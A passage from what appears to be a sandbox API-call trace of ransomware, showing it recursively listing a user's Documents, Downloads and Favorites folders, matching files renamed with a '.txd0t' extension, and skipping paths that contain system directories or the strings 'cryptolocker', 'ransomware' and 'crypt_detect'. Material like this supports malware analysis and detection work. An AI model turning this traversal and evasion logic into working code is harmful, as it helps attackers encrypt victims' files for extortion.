ftCreationTime.dwHighDateTime=0x1d5e102, ftLastAccessTime.dwLowDateTime=0xe5bb2500, ftLastAccessTime.dwHighDateTime=0x1d5eff9, ftLastWriteTime.dwLowDateTime=0x51afc2f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x184b4, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="RcZvqUQNfrhT.rtf.txd0t", cAlternateFileName="RCZVQU~1.TXD")) returned 1 [0119.464] StrCmpW (psz1="RcZvqUQNfrhT.rtf.txd0t", psz2=".") returned 1 [0119.464] StrCmpW (psz1="RcZvqUQNfrhT.rtf.txd0t", psz2="..") returned 1 [0119.464] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0119.464] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0119.464] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="RcZvqUQNfrhT.rtf.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf.txd0t" [0119.464] PathFindExtensionW (pszPath="RcZvqUQNfrhT.rtf.txd0t") returned=".txd0t" [0119.464] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.464] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f6cca00, ftCreationTime.dwHighDateTime=0x1d5e63f, ftLastAccessTime.dwLowDateTime=0x600cb1a0, ftLastAccessTime.dwHighDateTime=0x1d5e51b, ftLastWriteTime.dwLowDateTime=0x51b224ff, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13f1b, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="tPNskvgoa.ots.txd0t", cAlternateFileName="TPNSKV~1.TXD")) returned 1 [0119.464] StrCmpW (psz1="tPNskvgoa.ots.txd0t", psz2=".") returned 1 [0119.464] StrCmpW (psz1="tPNskvgoa.ots.txd0t", psz2="..") returned 1 [0119.464] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0119.464] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0119.464] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="tPNskvgoa.ots.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots.txd0t" [0119.464] PathFindExtensionW (pszPath="tPNskvgoa.ots.txd0t") returned=".txd0t" [0119.464] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.464] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d732c0, ftCreationTime.dwHighDateTime=0x1d5ec83, ftLastAccessTime.dwLowDateTime=0xed8ee220, ftLastAccessTime.dwHighDateTime=0x1d5e974, ftLastWriteTime.dwLowDateTime=0x51b224ff, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcfaa, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="tYF1BO7xWTgAbs uk76.csv.txd0t", cAlternateFileName="TYF1BO~1.TXD")) returned 1 [0119.464] StrCmpW (psz1="tYF1BO7xWTgAbs uk76.csv.txd0t", psz2=".") returned 1 [0119.464] StrCmpW (psz1="tYF1BO7xWTgAbs uk76.csv.txd0t", psz2="..") returned 1 [0119.464] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0119.464] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0119.464] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="tYF1BO7xWTgAbs uk76.csv.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv.txd0t" [0119.464] PathFindExtensionW (pszPath="tYF1BO7xWTgAbs uk76.csv.txd0t") returned=".txd0t" [0119.464] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.464] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd487f0, ftCreationTime.dwHighDateTime=0x1d5e930, ftLastAccessTime.dwLowDateTime=0x54780280, ftLastAccessTime.dwHighDateTime=0x1d5ed2d, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xb48a, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="vTQY5QAfnqPKv2th.odt.txd0t", cAlternateFileName="VTQY5Q~1.TXD")) returned 1 [0119.465] StrCmpW (psz1="vTQY5QAfnqPKv2th.odt.txd0t", psz2=".") returned 1 [0119.465] StrCmpW (psz1="vTQY5QAfnqPKv2th.odt.txd0t", psz2="..") returned 1 [0119.465] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0119.465] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0119.465] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="vTQY5QAfnqPKv2th.odt.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt.txd0t" [0119.465] PathFindExtensionW (pszPath="vTQY5QAfnqPKv2th.odt.txd0t") returned=".txd0t" [0119.465] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.465] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd487f0, ftCreationTime.dwHighDateTime=0x1d5e930, ftLastAccessTime.dwLowDateTime=0x54780280, ftLastAccessTime.dwHighDateTime=0x1d5ed2d, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xb48a, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="vTQY5QAfnqPKv2th.odt.txd0t", cAlternateFileName="VTQY5Q~1.TXD")) returned 0 [0119.465] FindClose (in: hFindFile=0xec1930 | out: hFindFile=0xec1930) returned 1 [0119.465] GetProcessHeap () returned 0xe30000 [0119.465] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x680dae8 | out: hHeap=0xe30000) returned 1 [0119.465] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x51b6eaa7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_HV0qcp0pks", cAlternateFileName="_HV0QC~1")) returned 0 [0119.465] FindClose (in: hFindFile=0xec1cb0 | out: hFindFile=0xec1cb0) returned 1 [0119.465] GetProcessHeap () returned 0xe30000 [0119.465] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0119.465] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_L78DH7wK y2TBjiEU", cAlternateFileName="_L78DH~1")) returned 0 [0119.465] FindClose (in: hFindFile=0xec1c70 | out: hFindFile=0xec1c70) returned 1 [0119.465] GetProcessHeap () returned 0xe30000 [0119.465] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.465] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x519cafed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z5Oif6_Mr_Ui", cAlternateFileName="Z5OIF6~1")) returned 0 [0119.465] FindClose (in: hFindFile=0xec1df0 | out: hFindFile=0xec1df0) returned 1 [0119.465] GetProcessHeap () returned 0xe30000 [0119.465] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.465] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0119.465] StrCmpW (psz1="Downloads", psz2=".") returned 1 [0119.465] StrCmpW (psz1="Downloads", psz2="..") returned 1 [0119.465] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.465] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.466] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Downloads", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Downloads") returned="C:\\Users\\FD1HVy\\Downloads" [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\system32\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\system\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\appdata\\local\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\boot\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\perflogs\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\programdata\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\drivers\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\wsus\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="crypt_detect") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="cryptolocker") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="ransomware") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="C:\\WINDOWS") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.466] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="C:\\Program Files") returned 0x0 [0119.466] GetProcessHeap () returned 0xe30000 [0119.466] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xef3600 [0119.466] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Downloads", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Downloads") returned="C:\\Users\\FD1HVy\\Downloads" [0119.466] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Downloads", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Downloads\\*") returned="C:\\Users\\FD1HVy\\Downloads\\*" [0119.466] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec19b0 [0119.467] StrCmpW (psz1=".", psz2=".") returned 0 [0119.467] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.467] StrCmpW (psz1="..", psz2=".") returned 1 [0119.467] StrCmpW (psz1="..", psz2="..") returned 0 [0119.467] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.467] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.467] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.467] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.467] FindClose (in: hFindFile=0xec19b0 | out: hFindFile=0xec19b0) returned 1 [0119.467] GetProcessHeap () returned 0xe30000 [0119.467] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.467] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0119.467] StrCmpW (psz1="Favorites", psz2=".") returned 1 [0119.467] StrCmpW (psz1="Favorites", psz2="..") returned 1 [0119.467] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.467] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.467] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Favorites", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0119.467] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\system32\\") returned 0x0 [0119.695] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.696] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\system\\") returned 0x0 [0119.696] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.698] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.698] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\appdata\\local\\") returned 0x0 [0119.699] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.699] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.701] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.701] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\boot\\") returned 0x0 [0119.702] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\perflogs\\") returned 0x0 [0119.703] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\programdata\\") returned 0x0 [0119.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\drivers\\") returned 0x0 [0119.705] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\wsus\\") returned 0x0 [0119.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.707] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.708] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="crypt_detect") returned 0x0 [0119.708] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="cryptolocker") returned 0x0 [0119.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="ransomware") returned 0x0 [0119.710] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="C:\\WINDOWS") returned 0x0 [0119.710] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="C:\\Program Files") returned 0x0 [0119.714] GetProcessHeap () returned 0xe30000 [0119.715] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xef3600 [0119.715] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Favorites", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0119.717] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\*") returned="C:\\Users\\FD1HVy\\Favorites\\*" [0119.717] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1eb0 [0119.722] StrCmpW (psz1=".", psz2=".") returned 0 [0119.722] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.724] StrCmpW (psz1="..", psz2=".") returned 1 [0119.726] StrCmpW (psz1="..", psz2="..") returned 0 [0119.728] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43598c8e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43b9f870, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x43b9f870, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Bing.url", cAlternateFileName="")) returned 1 [0119.728] StrCmpW (psz1="Bing.url", psz2=".") returned 1 [0119.729] StrCmpW (psz1="Bing.url", psz2="..") returned 1 [0119.729] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Favorites", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0119.729] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\") returned="C:\\Users\\FD1HVy\\Favorites\\" [0119.729] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites\\", psz2="Bing.url", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Bing.url") returned="C:\\Users\\FD1HVy\\Favorites\\Bing.url" [0119.730] PathFindExtensionW 